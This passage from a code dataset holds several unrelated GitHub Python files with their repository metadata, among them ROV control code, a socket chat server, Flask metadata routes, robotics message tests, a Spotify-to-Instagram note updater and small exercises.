valve4=valves.process(AB,BB,XB,YB,LB,RB)[3]\r\n\r\n if ser1_status == True:\r\n Pressure_status=Serial_1.Get_Var(11)\r\n IMU_status=Serial_1.Get_Var(12)\r\n else:\r\n Pressure_status=0\r\n IMU_status=0\r\n\r\n\r\n\r\n\r\n returned_dic={'Roll': roll_val , \r\n 'Pitch': pitch_val,\r\n 'Yaw': yaw_val,\r\n 'Accelx': round(accx,3) ,\r\n 'Accely': round(accy,3),\r\n 'Accelz': round(accz,3),\r\n 'patm': patm,\r\n 'depth': depth,\r\n 'underwater': uw,\r\n 'temp': temp ,\r\n 'ser1_status' : ser1_status , \r\n 'ser2_status' :ser2_status ,\r\n 'IMU_status' : IMU_status ,\r\n 'Pressure_status' : Pressure_status,\r\n 'joystick_status' : joystick_status,\r\n 'front_1' : int(front_1) ,\r\n 'front_2' : int(front_2) ,\r\n 'Rear_1' : int(Rear_1) ,\r\n 'Rear_2' : int(Rear_2) , \r\n 'up_1' : int(up_1) ,\r\n 'up_2' : int(up_2) , \r\n 'valve1' : bool(valve1) , \r\n 'valve2' : bool(valve2) , \r\n 'valve3' : bool(valve3) , \r\n 'valve4' : bool(valve4) , \r\n }\r\n\r\n\r\n if Serial_1.Get_status()==False:\r\n Serial_1_try_connect()\r\n\r\n if Serial_2.Get_status()==False:\r\n Serial_2_try_connect()\r\n\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n print(return_data())\r\n\r\n # print(valve1,valve2,valve3,valve4)\r\n \r\n time.sleep(0.01)\r\n\r\nwhile True:\r\n Run()\r\n\r\n\r\n '''\r\n To write:\r\n Serial_x.write(data) for example : \"#1|2|3*\"\r\n\r\n To read:\r\n Serial_x.Get_Data_With_Format(header, delimiter, terminator) for example: Serial_1.Get_Data_With_Format('#', '|', '*')\r\n Serial_1.Get_Var(index) for example: Serial_1.Get_Var(2)\r\n\r\n\r\n\r\n \r\n # Serial_1.write(data_valves) \r\n # Serial_1.Get_Data_With_Format('#', '|', '*')\r\n \r\n # pressure_abs=Serial_1.Get_Var(1)\r\n # pressure_sealevel = Serial_1.Get_Var(2)\r\n # DEPTH = Serial_1.Get_Var(3)\r\n # TEMPERATURE=Serial_1.Get_Var(4)\r\n # acc_x=Serial_1.Get_Var(5)\r\n # acc_y=Serial_1.Get_Var(6)\r\n # acc_z=Serial_1.Get_Var(7)\r\n # pitch=Serial_1.Get_Var(8)\r\n # roll=Serial_1.Get_Var(9)\r\n # yaw=Serial_1.Get_Var(10)\r\n #FLAG_bmp=Serial_1.Get_Var(11)\r\n #FLAG_MPU=Serial_1.Get_Var(12)\r\n\r\n\r\n\r\n # print(pressure_abs ,pressure_sealevel,DEPTH,TEMPERATURE,acc_x,acc_y,acc_z,pitch,roll,yaw)\r\n \r\n\r\n '''\r\n\r\n","repo_name":"Marwan-shahata/ROV_PROJECT_Hydrotron","sub_path":"ROV.py","file_name":"ROV.py","file_ext":"py","file_size_in_byte":10410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41605572949","text":"import numpy as np\nimport pandas as pd\nimport argparse\nfrom NFW import *\nfrom units import *\n\n\ndef main():\n mc_fname = '../mc/DNN_Cascade_L5_NuGen.pkl'\n mc = pd.read_pickle(mc_fname)\n\n if not args.allsky:\n try:\n mc_psi = mc['psi'] # Angle between l.o.s. 
and GC\n        except:\n            ras = mc['scram_trueRA']\n            decs = mc['scram_trueDEC']\n            mc_psi = np.array([psi_los_gc(ra,dec) for ra,dec in zip(ras,decs)])\n            mc['psi'] = mc_psi\n            mc.to_pickle(mc_fname)\n\n    try:\n        assert args.new == False\n        if args.allsky:\n            column_dens=np.load('../created_files/column_dens_allsky.npy')\n        else:\n            mc_col_dens = mc['col_dens']\n            column_dens=np.load('../created_files/DNN_NuGen_column_dens_true.npy')\n            assert np.array_equal(mc_col_dens, column_dens)\n    except:\n        if args.allsky: # All Sky Generic Column Density\n            ras = np.linspace(0,2*np.pi,100)\n            decs = np.linspace(-np.pi/2,np.pi/2,100)\n            RA,DEC = np.meshgrid(ras,decs)\n            PSI = np.array([psi_los_gc(RA.flatten()[i],DEC.flatten()[i]) for i in range(len(RA.flatten()))])\n            column_dens = t_spline(PSI)\n            np.save('../created_files/column_dens_allsky',column_dens)\n        else: # MC Column Density\n            column_dens = t_spline(mc_psi)\n            np.save('../created_files/DNN_NuGen_column_dens_true',column_dens)\n            mc['col_dens'] = column_dens\n            mc.to_pickle(mc_fname)\n\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='This script computes the column density (CD) for MC events')\n    parser.add_argument('--new',default=False, action=argparse.BooleanOptionalAction,help='Compute new set of array.')\n    parser.add_argument('--allsky',default=False, action=argparse.BooleanOptionalAction,help='Compute CD for all sky')\n    args = parser.parse_args()\n    main()\n","repo_name":"diyaselis/darkmatter_neutrino_scattering","sub_path":"code/create_column_density.py","file_name":"create_column_density.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30653622616","text":"import socket\nimport threading\n\nHOST = '127.0.0.1'\nPORT = 3000\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(msg):\n    for client in clients:\n        client.send(msg)\n\ndef handle(client):\n    while True:\n        try:\n            msg = client.recv(1024)\n            print(f'{nicknames[clients.index(client)]} diz {msg}')\n            broadcast(msg)\n        except:\n            index = clients.index(client)\n            clients.remove(client)\n            client.close()\n            nickname = nicknames[index]\n            nicknames.remove(nickname)\n\ndef receive():\n    while True:\n        client, adress = server.accept()\n        print(f'Conectado com {adress}!')\n        client.send(\"NICK\".encode('utf-8'))\n        nickname = client.recv(1024)\n\n        nicknames.append(nickname)\n        clients.append(client)\n\n        print(f\"Nickname do cliente é {nickname}\")\n        broadcast(f\"{nickname} conectado ao servidor!\\n\".encode('utf-8'))\n        client.send(\"Conectado ao servidor\".encode('utf-8'))\n\n        thread = threading.Thread(target=handle, args=(client,))\n        thread.start()\n\nprint(\"Server funcionando...\")\nreceive()","repo_name":"Thiago250801/ChatApp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38026710685","text":"import datetime\nimport requests\nfrom tqdm import tqdm \nfrom webService import WebService\nimport csv\nimport sys,getopt\n\nwebService = WebService()\n\ndef listaGrabaciones(recordings):\n    recordinglist = []\n    x=0\n    try:\n        number_of_recordings = (len(recordings['results']))\n        if number_of_recordings <= 0:\n            return None\n        while x < number_of_recordings:\n            recordinglist.append({\"recording_id\" : recordings['results'][x]['id'], \"recording_name\" : 
recordings['results'][x]['name'], \"duration\":recordings['results'][x]['duration'], \"storageSize\":recordings['results'][x]['storageSize'],\"created\": recordings['results'][x]['created']})\n x += 1\n return recordinglist\n except TypeError:\n return None\n\n\n\n\ndef descargarGrabacion(url:str, fname:str):\n resp = requests.get(url,stream=True)\n total = int(resp.headers.get('content-length',0))\n progress_bar = tqdm(total=total, unit='iB', unit_scale=True,unit_divisor=1024)\n with open(fname,'wb') as file:\n for data in resp.iter_content(chunk_size=1024):\n size = file.write(data)\n progress_bar.update(size)\n progress_bar.close()\n\n \n\ndef downloadrecording(recording_list, name, course_uuid):\n for recording in recording_list:\n recording_data = webService.get_recording_data(recording['recording_id'])\n filename = name + ' - ' + recording['recording_name'].replace(':', ' ').replace('/', ' ').replace('”', '').replace('“', '').replace(',', '').replace('?', '') + '.mp4'\n fullpath = './downloads/'\n print(fullpath + filename)\n descargarGrabacion(recording_data['extStreams'][0]['streamUrl'],fullpath + filename)\n \n\ndef crearReporte(reporte):\n filename = \"recordingReport.csv\"\n header = [\"Recording ID\", \"Recording Name\", \"Duration\", \"Storage Size (MB)\", \"Created Date\"]\n file = open(filename, 'w')\n writer = csv.writer(file)\n writer.writerow(header)\n for x in range(len(reporte)):\n registro = reporte[x]\n recording_id = registro[0]\n recording_name = registro[1]\n duration = calcularTiempo(int(registro[2]/1000))\n storage = str(round(float(registro[3])/1000000, 2))\n created = convertirFecha(registro[4])\n writer.writerow([recording_id,recording_name,duration,storage,created])\n file.close()\n return \"Report: recordingReport.csv created!\"\n\n\n\ndef leerCursos(filename):\n cursos = []\n with open(filename) as reader:\n for linea in reader:\n contenido = linea.rstrip()\n cursos.append(str(contenido))\n reader.close()\n return cursos\n\n\ndef leerUUID(filename):\n uuids = []\n with open(filename) as reader:\n for linea in reader:\n contenido = linea.rstrip()\n uuids.append(str(contenido))\n reader.close()\n return uuids\n\n\ndef main(argv):\n archivoCursos = ''\n archivoUUID = ''\n semanas = 0\n try:\n opts,args = getopt.getopt(argv,\"hf:e:w:\", [\"cfile=\",\"ext=\",\"weeks=\"])\n except getopt.GetoptError:\n print('Collab.py -f -w ')\n print('Collab.py -e -w ')\n sys.exit(2)\n for opt,arg in opts:\n if opt == '-h':\n print('Collab.py -f -w ')\n print('Collab.py -e -w ')\n sys.exit()\n elif opt in ('-f', '--cfile'):\n archivoCursos = arg\n elif opt in ('-w', '--weeks'):\n semanas = int(arg)\n elif opt in ('-e', '--ext'):\n archivoUUID = arg\n\n return [archivoCursos, archivoUUID,semanas]\n\n\ndef calcularTiempo(s):\n m, s = divmod(s,60)\n h,m = divmod(m,60)\n d, h = divmod(h,24)\n tiempoEnSesion = datetime.time(h,m,s)\n return tiempoEnSesion.strftime('%H:%M:%S')\n\n\ndef convertirFecha(fecha):\n objetoFecha = datetime.datetime.strptime(fecha,'%Y-%m-%dT%H:%M:%S.%fZ')\n return objetoFecha.strftime('%b %d,%Y')\n\n\n","repo_name":"daveyherrera/PyCollab","sub_path":"Utilidades.py","file_name":"Utilidades.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"424147655","text":"# 프로그래머스 게임 맵 최단거리 (Level 2)\nfrom collections import deque\n\n\ndef solution(maps):\n dir_x = [1, -1, 0, 0]\n dir_y = [0, 0, 1, -1]\n N = len(maps)\n M = len(maps[0])\n visited = [[0 for _ in range(M)] for _ in 
range(N)]\r\n\r\n    queue = deque()\r\n    queue.append([0, 0])\r\n    visited[0][0] = 1\r\n    while queue:\r\n        x, y = queue.popleft()\r\n        for i in range(4):\r\n            temp_x = x + dir_x[i]\r\n            temp_y = y + dir_y[i]\r\n            if 0 <= temp_x < N and 0 <= temp_y < M and not visited[temp_x][temp_y] and maps[temp_x][temp_y] == 1:\r\n                queue.append([temp_x, temp_y])\r\n                visited[temp_x][temp_y] = 1 + visited[x][y]\r\n    if not visited[N-1][M-1]:\r\n        return -1\r\n\r\n    return visited[N-1][M-1]\r\n\r\n\r\nmaps = [[1, 0, 1, 1, 1], [1, 0, 1, 0, 1], [\r\n    1, 0, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 0, 1]]\r\nprint(solution(maps))\r\n","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"026주차/게임맵최단거리/woosteelz.py","file_name":"woosteelz.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
{"seq_id":"16446581117","text":"from app import app, db, auto, admin_only, ENTITY_MAPPING\nfrom app.models import metadata\nfrom flask import abort, jsonify, request, Response\nfrom flask_login import login_required, current_user\nfrom dateutil import parser\nimport json\n\n\n@app.route('/ThreatKB/metadata', methods=['GET'])\n@auto.doc()\n@login_required\ndef get_all_metadata():\n    \"\"\"Return all active metadata\n    Return: list of metadata dictionaries\"\"\"\n    active_only = request.args.get(\"active_only\", True)\n    artifact_type = request.args.get(\"artifact_type\", 0)\n    format = request.args.get(\"format\", \"list\")\n    filter = request.args.get(\"filter\", None)\n\n    if format == \"dict\" and filter:\n        return Response(json.dumps([metadata.Metadata.get_metadata_dict(filter.upper())]), mimetype=\"application/json\")\n\n    q = metadata.Metadata.query\n    q = q.filter_by(active=active_only)\n    if artifact_type:\n        q = q.filter_by(artifact_type=artifact_type)\n\n    if filter:\n        return Response(json.dumps([entity.to_dict() for entity in q.all() if entity.to_dict()[\"type\"] == filter]),\n                        mimetype='application/json')\n    else:\n        return Response(json.dumps([entity.to_dict() for entity in q.all()]), mimetype='application/json')\n\n\n@app.route('/ThreatKB/metadata/<int:id>', methods=['GET'])\n@login_required\n@auto.doc()\ndef get_metadata(id):\n    \"\"\"Return task associated with given id\n    Return: task dictionary\"\"\"\n    entity = metadata.Metadata.query.get(id)\n    if not entity:\n        abort(404)\n\n    return jsonify(entity.to_dict())\n\n\n@app.route('/ThreatKB/metadata', methods=['POST', 'PUT'])\n@auto.doc()\n@login_required\n@admin_only()\ndef create_metadata():\n    \"\"\"Create new metadata\n    From Data: key (str), active (int), artifact_type (int), type (str), default (str), show_in_table (int)\n    Return: task dictionary\"\"\"\n\n    type_ = request.json['type']\n    default = request.json.get('default', None)\n    choices = request.json.get(\"choices\", \"\")\n    choices = [choice.strip() for choice in choices.split(\",\") if len(choice) > 0]\n\n    if type_.lower() == \"integer\" and default:\n        default = int(default)\n\n    if type_.lower() == \"date\" and default:\n        default = parser.parse(default)\n\n    if type_.lower() == \"select\" and not choices:\n        raise Exception(\"You must provide choices with the select option\")\n\n    entity = metadata.Metadata(\n        key=request.json['key']\n        , active=request.json.get('active', 1)\n        , artifact_type=request.json['artifact_type']\n        , type_=type_\n        , default=default\n        , show_in_table=0\n        , required=request.json.get(\"required\", 0)\n        , export_with_release=request.json.get(\"export_with_release\", 1)\n        , created_user_id=current_user.id\n    )\n    db.session.add(entity)\n    db.session.commit()\n\n    for choice in 
choices:\n        db.session.add(metadata.MetadataChoices(choice=choice, metadata_id=entity.id, created_user_id=current_user.id))\n    db.session.commit()\n\n    return jsonify(entity.to_dict()), 201\n\n\n@app.route('/ThreatKB/metadata', methods=['DELETE'])\n@auto.doc()\n@login_required\n@admin_only()\ndef delete_metadata_by_id_in_param():\n    \"\"\"Delete metadata associated with the given id\n    Return: None\"\"\"\n    id = request.args.get(\"id\")\n    entity = metadata.Metadata.query.get(id)\n\n    if not entity:\n        abort(404)\n\n    entity.active = False\n    db.session.add(entity)\n    db.session.commit()\n\n    return jsonify(''), 204\n\n\n@app.route('/ThreatKB/metadata/<int:id>', methods=['DELETE'])\n@auto.doc()\n@login_required\n@admin_only()\ndef delete_metadata(id):\n    \"\"\"Delete metadata associated with the given id\n    Return: None\"\"\"\n    entity = metadata.Metadata.query.get(id)\n\n    if not entity:\n        abort(404)\n\n    # db.session.delete(entity)\n    entity.active = False\n    db.session.add(entity)\n    db.session.commit()\n\n    return jsonify(''), 204\n","repo_name":"InQuest/ThreatKB","sub_path":"app/routes/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"}
{"seq_id":"31953435905","text":"import numpy as np\nimport unittest\nimport time\nfrom isaac import Application, Message\n\n\nclass TestPythonMessage(unittest.TestCase):\n    '''\n    Test receiving messages via the application message API\n    '''\n    @classmethod\n    def setUpClass(cls):\n        # method will be ran once before any test is ran\n        cls.app = Application('packages/pyalice/tests/pymessage_test.app.json')\n        cls.app.start()\n\n    @classmethod\n    def tearDownClass(cls):\n        # method will be ran once after all tests have run\n        cls.app.stop()\n\n    def setUp(self):\n        # make sure the app ticks at least one time between tests\n        time.sleep(0.5)\n\n    def test_receive_message_as_json(self):\n        msg = self.app.receive(\"mock\", \"Detections2Generator\", \"mock_detections\")\n\n        self.assertNotEqual(msg.type_id, 0)\n        self.assertGreater(msg.acqtime, 0)\n        self.assertEqual(msg.json[\"predictions\"][0][\"label\"], \"A\")\n\n    def test_receive_message_as_proto(self):\n        msg = self.app.receive(\"mock\", \"Detections2Generator\", \"mock_detections\")\n\n        self.assertNotEqual(msg.type_id, 0)\n        self.assertGreater(msg.acqtime, 0)\n        self.assertEqual(msg.proto.predictions[0].label, \"A\")\n\n    def test_receive_message_tensor(self):\n        msg = self.app.receive(\"mock\", \"CameraGenerator\", \"color_left\")\n\n        self.assertGreater(msg.acqtime, 0)\n        self.assertIsNotNone(msg.tensor)\n\n    def test_no_message_available(self):\n        msg = self.app.receive(\"node\", \"component\", \"channel\")\n        self.assertIsNone(msg)\n\n    def test_send_message_with_acqtime(self):\n        send_msg = Message.create_message_builder('PingProto')\n        send_msg.proto.message = 'payload'\n        send_msg.acqtime = 10\n        self.app.publish('node', 'ledger', 'in', send_msg)\n\n        recv_msg = self.app.receive('node', 'ledger', 'in')\n        self.assertEqual(recv_msg.proto.message, 'payload')\n        self.assertEqual(recv_msg.acqtime, 10)\n\n    def test_send_message_has_metadata(self):\n        send_msg = Message.create_message_builder('PingProto')\n        send_msg.proto.message = 'payload'\n        self.app.publish('node', 'ledger', 'in', send_msg)\n\n        recv_msg = self.app.receive('node', 'ledger', 'in')\n        self.assertGreater(recv_msg.pubtime, 0)\n        self.assertNotEqual(recv_msg.uuid, \"\")\n\n    def test_send_message_with_buffer(self):\n        send_msg = Message.create_message_builder('PingProto')\n        
send_msg.proto.message = 'payload'\n        buffer = np.empty(3, dtype=np.dtype('B'))\n        buffer[0] = 1\n        buffer[1] = 11\n        buffer[2] = 111\n        send_msg.buffers = [buffer]\n        self.app.publish('node', 'ledger', 'in', send_msg)\n\n        recv_msg = self.app.receive('node', 'ledger', 'in')\n        self.assertEqual(recv_msg.buffers[0][0], 1)\n        self.assertEqual(recv_msg.buffers[0][1], 11)\n        self.assertEqual(recv_msg.buffers[0][2], 111)\n\n    def test_send_message_proto(self):\n        send_msg = Message.create_message_builder('PingProto')\n        send_msg.proto.message = 'payload'\n        self.app.publish('node', 'ledger', 'in', send_msg)\n\n        recv_msg = self.app.receive('node', 'ledger', 'in')\n        self.assertNotEqual(recv_msg.type_id, 0)\n        self.assertEqual(recv_msg.proto.message, 'payload')\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"NamWoo/isaac-sdk-20201201-427971df2","sub_path":"sdk/packages/pyalice/tests/pymessage_test.py","file_name":"pymessage_test.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"34116932972","text":"\nlista = [\n    ('chave', 'valor'),\n    ('chave2', 'valor2'),\n    ('chave3', 3),\n]\n\n# d1 = { x: y*2 for x, y in lista}\n# d1 = { x.upper(): y.upper()*2 for x, y in lista}\n\nd1 = { f'chave_{x}': x**2 for x in range(5)}\n\n\nprint(d1)","repo_name":"pinheirogus/Curso-Python-Udemy","sub_path":"Dict comp/aula67.py","file_name":"aula67.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"34498097902","text":"# 검사 상수(키값) 지정\r\nkey_list = []# 키값 저장용\r\nfor value in range(2, 14):# 키값 저장\r\n    if value >= 10:\r\n        key_list.append(value % 10 + 2)\r\n    else:\r\n        key_list.append(value)\r\n\r\n# 주민번호 입력받기\r\nuser_num = input(\"주민번호 13자리를 입력하세요\")\r\n\r\n# 주민번호 판별 후 (리스트)저장\r\nuser_list = [] # 리스트 저장용\r\nfor value in user_num:\r\n    if value.isdigit():\r\n        user_list.append(int(value))\r\n\r\n# 리스트와 키값 비교계산\r\ncal_sum = 0\r\nfor value in range(12):\r\n    # 곱셈, 덧셈\r\n    cal_sum += (key_list[value] * user_list[value])\r\n\r\n# 체크 계산\r\ncheck_value = 11 - (cal_sum % 11)\r\nif check_value >= 10:\r\n    check_value = check_value % 10\r\n# 유효 여부 판별\r\nif check_value == user_list[12]:\r\n    print(\"유효한 주민번호 입니다.\")\r\nelse:\r\n    print(\"유효하지 않은 주민번호 입니다.\")","repo_name":"CSKYScarlet/work","sub_path":"python/user_num.py","file_name":"user_num.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40087767164","text":"import spotipy\nfrom instagrapi import Client\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom dotenv import load_dotenv\nimport os\nimport time\n\n# Load from .env\nload_dotenv()\nusername = os.getenv(\"USERNAME\")\npassword = os.getenv(\"PASSWORD\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\nREDIRECT_URI = os.getenv(\"REDIRECT_URI\")\n\n# Setup Instagram authentication\ncl = Client()\ncl.login(username, password)\n\n# Set up Spotify authentication\nsp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=CLIENT_ID,\n                                               client_secret=CLIENT_SECRET,\n                                               redirect_uri=REDIRECT_URI,\n                                               scope=\"user-read-playback-state\"))\n\n# Make sure it's not over 60 characters\n# Instagram may see a failed request for 60+ chars and get sus :3\ndef check_string_length(input_string):\n    if len(input_string) > 60:\n        raise ValueError(\"IT'S TOO FUCKING BIG YOU BUMBLING FORK\")\n    else:\n        print(\"Note is under 60 
characters, weewoo!\")\n\n# Cut it off WOOOOOOOOO\ndef truncate(s):\n if len(s) > 20:\n return s[:17] + \"...\"\n else:\n return s\n\n# Ensure it works the first time\ntrack_name = None\n\nwhile True:\n # Get currently playing track\n current_track = sp.current_playback()\n\n # Get current track info and set it as the user's note if track_name changes\n if current_track is not None and 'item' in current_track:\n new_track_name = current_track['item']['name']\n\n if new_track_name != track_name:\n artist_name = current_track['item']['artists'][0]['name']\n truncated_track_name = truncate(new_track_name)\n truncated_artist_name = truncate(artist_name)\n content = (f\"🎵 Playing: {truncated_track_name} by {truncated_artist_name}\")\n check_string_length(content)\n note = cl.create_note(content, 0)\n print(f\"Track Changed! Set note to '{content}'\")\n\n # Update track_name to the new_track_name\n track_name = new_track_name\n else:\n print(\"Track not changed, sleeping for 10 seconds. shhhhh mimimi\")\n else:\n print(\"No track is currently playing.\")\n\n # Add a delay to avoid continuous API requests\n time.sleep(10) # Adjust the delay time as needed","repo_name":"rainyskye/spotify-ignotes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41457811159","text":"#\n# @lc app=leetcode id=2562 lang=python3\n#\n# [2562] Find the Array Concatenation Value\n#\n\n# @lc code=start\nfrom collections import deque\nclass Solution:\n def findTheArrayConcVal(self, nums: List[int]) -> int:\n ans =0\n nums = deque(nums)\n\n while len(nums) >1:\n ans+=int(str(nums.popleft())+str(nums.pop()))\n \n if len(nums):\n ans+=nums[0]\n \n return ans\n\n \n# @lc code=end\n\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/2562.find-the-array-concatenation-value.py","file_name":"2562.find-the-array-concatenation-value.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72972113513","text":"from os import system\n\nsystem('clear')\n\nprint('Analisando as medidas...')\nreta_1 = float(input('Primeiro seguimento: '))\nreta_2 = float(input('Segundo segmento: '))\nreta_3 = float(input('Terceiro segmento: '))\n\nequilatero = reta_1 == reta_2 == reta_3\nisosceles = reta_1 == reta_2 or reta_2 == reta_3 or reta_1 == reta_3\nescaleno = reta_1 != reta_2 != reta_3\n\nif reta_1 < reta_2 + reta_3 and reta_2 < reta_1 + reta_3 and reta_3 < reta_2 + reta_1:\n print('Os segmentos podem formar um triângulo')\n\n if equilatero:\n print('É um triângulo equilatero')\n elif isosceles:\n print('É um triângulo isósceles')\n else:\n print('É um triângulo escaleno')\n\nelse:\n ('Os segmentos NÃO podem formar um triângulo')\n","repo_name":"bernaRocha/guanabara_Python","sub_path":"exercicios31-50/ex_042-analisando-triangulos.py","file_name":"ex_042-analisando-triangulos.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27630444598","text":"# rectangle-information.py\n\nfrom graphics import *\n\ndef main():\n\n win = GraphWin(\"Rectangle information\", 320, 240)\n win.setBackground(\"white\")\n\n instructions = Text(Point(160, 20), \"Click twice for the apex of the rectangle.\")\n instructions.draw(win)\n\n p1 = win.getMouse()\n p2 = win.getMouse()\n\n rectangle = Rectangle(Point(p1.getX(), 
p1.getY()), Point(p2.getX(), p2.getY()))\n rectangle.setFill(\"yellow\")\n rectangle.setWidth(2)\n rectangle.setOutline(\"black\")\n rectangle.draw(win)\n\n instructions.setText(\"Calculating the area and perimeter of the rectangle.\")\n\n dx = p2.getX() - p1.getX()\n dy = p2.getY() - p1.getY()\n\n area = dx * dy\n perimeter = 2 * (dx + dy)\n\n print(\"The area of the rectangle is\", area, \", and the perimeter is\", perimeter, \".\")\n\n print(\"Press to quit\")\n\n win.getKey()\n win.close()\n\nmain()\n","repo_name":"sebutz/John-Zelle-Python-Programming","sub_path":"rectangle-information.py","file_name":"rectangle-information.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25348977407","text":"__author__ = 'admin'\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport glob\nimport traceback\nimport sys\nimport collections\nfrom collections import deque\nfrom itertools import islice\nimport math\n\n\ndef sliding_window(iterable, size=25, step=1, fillvalue=None):\n print(\"Inside Function------------->>>\")\n if size < 0 or step < 1:\n raise ValueError\n it = iter(iterable)\n q = deque(islice(it, size), maxlen=size)\n print(q)\n if not q:\n return # empty iterable or size == 0\n q.extend(fillvalue for _ in range(size - len(q))) # pad to size\n while True:\n yield iter(q) # iter() to avoid accidental outside modifications\n q.append(next(it))\n q.extend(next(it, fillvalue) for _ in range(step - 1))\n\n\ndef read_in_chunks(file_object):\n \"\"\"Lazy function (generator) to read a file piece by piece.\n Default chunk size: 1k.\"\"\"\n while True:\n data = file_object.readline()\n if not data:\n break\n yield data\n\n\ninput_file = input(\"Enter file path :\")\ni = 1\nj = 0\ntry:\n fileList = glob.glob(input_file + '*.csv')\n c = open(\"C:\\\\mtech Data\\\\congestion\\\\test script\\\\cleanedFile.csv\", 'w')\n print(fileList)\n for file in fileList:\n a = open(file, 'r')\n line = ''\n dq = collections.deque(maxlen=2040)\n dqTemp = collections.deque(maxlen=2040)\n i = 0\n diffFlag = 0\n for lines in read_in_chunks(a):\n # line = sliding_window(lines)\n # print(line)\n # for _ in range(2050):\n dq.append(lines)\n dqTemp.append(lines)\n i = i + 1\n # repeated compute\n\n if (i == 2040):\n diffFlag = 0\n dq.reverse()\n dqTemp.reverse()\n try:\n while (dq):\n # print(dq)\n tempLine1 = dq.pop()\n #print(tempLine1)\n tmp1 = tempLine1.split(',')\n tempLine2 = dq.pop()\n tmp2 = tempLine2.split(',')\n diff = 0\n #print(tmp1[18])\n if ((tmp1[18] != 'pressure') & (tmp1[18] != '') & (tmp2[18] != '')):\n diff = math.fabs(float(tmp2[18]) - float(tmp1[18]))\n #print(diff)\n if (float(diff) > 0.1000):\n diffFlag = 1\n break\n while (dqTemp):\n tp = dqTemp.pop()\n strTemp = tp.rstrip('\\n') + ',' + str(diffFlag) + ',' + '\\n'\n # print(diffFlag)\n c.write(strTemp)\n strTemp = ''\n diffFlag = 0\n dq.clear()\n dqTemp.clear()\n i = 0\n\n except StopIteration as e:\n print(e)\n\nexcept Exception as e:\n print(e)\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n","repo_name":"chestasofat/PythonScripts","sub_path":"barometerPattern.py","file_name":"barometerPattern.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40462086230","text":"\nfrom django.test import TestCase\nfrom web.forms import ModuleForm\nfrom web.models import 
Module\n\n\n\nexample_module = {'title' : \"A cylinder\",\n 'modulename' : \"cylinder\", \n 'author' : \"Phaiax\", \n 'author_acronym' : \"Px\",\n 'sourcecode' : \"module cylinder() { }\", \n 'documentation' : \"call cylinder()\", \n 'description' : \"This makes a cylinder\",\n 'version' : 1}\n\nclass ModuleModelTest(TestCase):\n\n \n def test_can_create_and_safe_module(self):\n M = Module()\n M.author = \"Phaiax\"\n M.save()\n R = Module.objects.get(guid=M.guid)\n self.assertEqual(\"Phaiax\", R.author)\n\n \n def test_module_generates_and_saves_uniquename(self):\n M = Module(**example_module)\n gn = M.generate_uniquename()\n M.save()\n self.assertEquals(gn, M.uniquename)\n \n def test_uniquename_is_always_unique(self):\n M = Module(**example_module)\n M.save()\n M2 = Module(**example_module)\n M2.save()\n self.assertNotEqual(M2.uniquename, M.uniquename)\n pass\n \n def test_form_validates_that_sourcecode_contains_modulename(self):\n invalid_module = example_module.copy()\n invalid_module['modulename'] = 'baseball'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('sourcecode' in M.errors)\n \n def test_module_validates_that_modulename_is_valid(self):\n invalid_module = example_module.copy()\n invalid_module['modulename'] = '1cylinder'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'cylin der'\n M = ModuleForm(invalid_module)\n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'calinger%'\n M = ModuleForm(invalid_module) \n self.assertFalse(M.is_valid())\n self.assertTrue('modulename' in M.errors)\n invalid_module['modulename'] = 'cylinder'\n M = ModuleForm(invalid_module) \n 